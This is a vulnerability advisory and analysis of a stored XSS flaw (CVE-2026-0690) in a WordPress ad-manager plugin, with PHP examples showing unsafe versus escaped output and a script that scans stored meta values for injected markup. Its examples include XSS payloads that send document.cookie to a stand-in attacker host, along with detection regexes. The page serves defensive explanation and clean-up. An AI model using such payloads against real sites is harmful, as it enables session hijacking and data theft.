CVE-2026-0690 in FlatPM Plugin
Summary
by MITRE • 01/20/2026
The FlatPM – Ad Manager, AdSense and Custom Code plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rank_math_description' custom field in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Analysis
by VulDB Data Team • 01/22/2026
CVE-2026-0690 is a stored cross-site scripting flaw in the FlatPM – Ad Manager, AdSense and Custom Code plugin for WordPress, present in all versions up to and including 3.2.2. Any site that relies on the plugin for ad placement or custom code is exposed. The entry point is the 'rank_math_description' custom field, a post meta value the plugin renders into the page without adequate escaping, so a payload saved once persists in the database and is served on every subsequent view of the affected page.
The flaw is a missing sanitize-on-save combined with a missing escape-on-output. An authenticated user with the Contributor role or higher can set the 'rank_math_description' custom field on a post; the plugin stores the value without validating or sanitizing it and later writes it into the page without encoding it for the HTML context in which it appears. Output escaping is the control that matters: a value can be stored verbatim as long as every place that renders it encodes it for its context (esc_attr() for attribute values, esc_html() for text nodes in WordPress). Without it, the injected JavaScript runs in the browser of every visitor to the page, including the editor or administrator who reviews the contributor's pending post.
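The pattern described above, reduced to a stand-alone PHP script. This is an added example, not FlatPM's code, and the rendering and save functions are hypothetical; the WordPress helpers esc_attr() and sanitize_text_field() are approximated here so the script runs with the plain php CLI outside WordPress. The attacker payload is constructed for the example.

```php
<?php
// Added example (not the plugin's code): a contributor-supplied post meta
// value rendered into a <meta name="description"> tag, first without and
// then with output escaping. The WordPress helpers are emulated below so
// this runs outside WordPress; in a plugin, call the real functions.

if (!function_exists('esc_attr')) {
    // Equivalent of WordPress esc_attr(): encode for an HTML attribute value.
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    // Approximation of WordPress sanitize_text_field(): strip tags, drop
    // control characters, trim. The real function also strips script and
    // style contents and normalises whitespace.
    function sanitize_text_field(string $s): string {
        return trim(preg_replace('/[\x00-\x1f\x7f]/', '', strip_tags($s)));
    }
}

// Constructed attacker input, as a contributor could save it through the
// post editor's custom fields box under the key rank_math_description.
$stored = '"><script>document.location="https://attacker.example/?c="+document.cookie</script>';

// Vulnerable pattern (hypothetical): meta value interpolated with no escaping.
function render_description_unsafe(string $meta): string {
    return '<meta name="description" content="' . $meta . '">';
}

// Hardened pattern: escape for the attribute context at output time.
function render_description_safe(string $meta): string {
    return '<meta name="description" content="' . esc_attr($meta) . '">';
}

// Defence in depth: sanitize on save so only plain text reaches the database.
// This does not replace output escaping, which is what makes rendering safe
// in every context.
function save_description(string $raw): string {
    return sanitize_text_field($raw);
}

echo "Unsafe output (payload breaks out of the attribute):\n";
echo render_description_unsafe($stored), "\n\n";

echo "Escaped output (payload is inert attribute text):\n";
echo render_description_safe($stored), "\n\n";

echo "Sanitized on save, then escaped on output:\n";
echo render_description_safe(save_description($stored)), "\n";
```

Run it with `php example.php`. The unsafe line closes the content attribute and the meta tag with `">` and then emits a live script element; the escaped line contains the same bytes encoded as `&quot;&gt;&lt;script&gt;...`, which a browser treats as attribute text.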
The operational impact follows from where the script runs: in the browser of whoever views the page, with that user's session. WordPress sets its authentication cookies HttpOnly, so plain cookie theft is less likely to succeed than script that acts with the victim's session directly: requests the script makes to wp-admin or the REST API carry the victim's cookies and can use the nonces present on the page, which is enough to create a user, change an option, or install a plugin when the victim is an administrator. Redirection to a malicious site, content defacement, and delivery of browser exploits are also available. Because the payload is stored, it fires on every view until the meta value is removed, and it keeps firing after the plugin is patched if the stored value is left in place.
The weakness maps to CWE-79: Improper Neutralization of Input During Web Page Generation, which covers exactly this failure to escape user input before placing it in a page. MITRE ATT&CK has no technique for stored XSS as such; the closest mappings are T1059.007 (Command and Scripting Interpreter: JavaScript) for the payload and T1189 (Drive-by Compromise) for its delivery to victims who merely visit the page. Contributor access is a prerequisite for injection, not a privilege escalation in itself; the escalation happens when the script runs in a higher-privileged user's browser. The OWASP Top Ten 2021 lists cross-site scripting under A03:2021-Injection.
Mitigation starts with updating the plugin to a release later than 3.2.2, the last affected version named in the advisory. Patching stops new injections but does not clean up what is already stored, so audit existing 'rank_math_description' values in wp_postmeta and remove any that contain markup, event handlers, or javascript: URLs. Limit the Contributor role to people who need it, since every contributor account is a potential injection point, and review custom fields on pending and published posts as part of the editorial workflow. A web application firewall can block the obvious payload shapes, but it is a compensating control only; the fix is context-aware output escaping in the plugin.
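A triage script for the clean-up step above, added here as an example and not part of the advisory or the plugin. It scans rows shaped like wp_postmeta for values that look like markup rather than a plain-text description. The rows are constructed sample data; on a real site you would obtain them with `wp db query` or a prepared SELECT on wp_postmeta WHERE meta_key = 'rank_math_description'. The indicator patterns and the function name are this example's own choices.

```php
<?php
// Added example (not the plugin's code): find already-stored XSS payloads in
// rank_math_description meta values after patching. Rows are constructed.

function find_injected_meta(array $rows): array {
    // Patterns that indicate HTML or JavaScript in a plain-text field.
    // A bare '<' followed by a digit or space (e.g. "< 10 USD") is not flagged.
    $indicators = [
        'tag'      => '/<\s*\/?\s*[a-z][^>]*>/i',  // any HTML tag
        'handler'  => '/\bon[a-z]+\s*=/i',          // onerror=, onload=, ...
        'js_uri'   => '/javascript\s*:/i',          // javascript: URLs
        'breakout' => '/["\']\s*>/',                // closing a quoted attribute
    ];
    $hits = [];
    foreach ($rows as $row) {
        $value = (string) $row['meta_value'];
        $matched = [];
        foreach ($indicators as $name => $re) {
            if (preg_match($re, $value)) {
                $matched[] = $name;
            }
        }
        if ($matched) {
            $hits[] = [
                'post_id'    => (int) $row['post_id'],
                'meta_key'   => $row['meta_key'],
                'indicators' => $matched,
            ];
        }
    }
    return $hits;
}

// Constructed sample rows in wp_postmeta shape: two benign, two injected.
$rows = [
    ['post_id' => 12, 'meta_key' => 'rank_math_description',
     'meta_value' => 'A plain product description for the spring sale.'],
    ['post_id' => 15, 'meta_key' => 'rank_math_description',
     'meta_value' => '"><img src=x onerror=fetch("https://attacker.example/?c="+document.cookie)>'],
    ['post_id' => 19, 'meta_key' => 'rank_math_description',
     'meta_value' => 'Price is < 10 USD, see details.'],
    ['post_id' => 23, 'meta_key' => 'rank_math_description',
     'meta_value' => '<script>alert(document.domain)</script>'],
];

foreach (find_injected_meta($rows) as $hit) {
    printf("post %d: %s flagged (%s)\n",
        $hit['post_id'], $hit['meta_key'], implode(', ', $hit['indicators']));
}
```

On the sample rows this flags post 15 (tag, handler, breakout) and post 23 (tag) and leaves 12 and 19 alone. Treat hits as candidates for review rather than proof; once confirmed, `wp post meta delete <post_id> rank_math_description` removes the value, and the post's revision history shows which account saved it.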